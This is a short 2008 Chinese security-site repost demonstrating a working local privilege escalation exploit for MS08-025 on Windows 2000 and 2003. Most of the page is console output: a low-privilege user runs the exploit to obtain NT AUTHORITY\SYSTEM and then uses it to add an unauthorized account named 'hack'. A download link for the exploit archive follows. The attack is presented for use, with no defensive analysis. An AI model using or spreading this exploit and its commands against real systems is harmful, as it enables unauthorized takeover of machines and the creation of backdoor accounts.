MS08-025 for win2k win2k3

作者：佚名文章来源：本站整理点击数：更新时间：2008-4-26

来源：酒水不犯茶水

Win2k CN SP2 ，Win2k3 CN SP1下测试通过，其它未测试(不装XP那种垃圾)
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系统发生 5 错误。
拒绝访问。

D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
NT AUTHORITY\SYSTEM
D:\>ms08025 “net user hack /add”
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
D:\>命令成功完成。
D:\>net user
\\BAICKER-VMWARE 的用户帐户
——————————————————————————-
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:\>

http://www.blogjava.net/Files/baicker/ms08025.rar

上一篇文章：又一个MS08-025漏洞利用过程解密

下一篇文章：简单脱壳－Armadillo360标准加壳的记事本程序

相文内容：

无线网络安全的三大途径和六大方法
Hzhost虚拟主机系统致命漏洞(图)
电脑安全软件安博士2008完美体验教程
SWF漏洞详解
XP的主要的15个系统进程
baidu搜索：MS08-025 for win2k win2k3
Google搜索：搜索：MS08-025 for win2k win2k3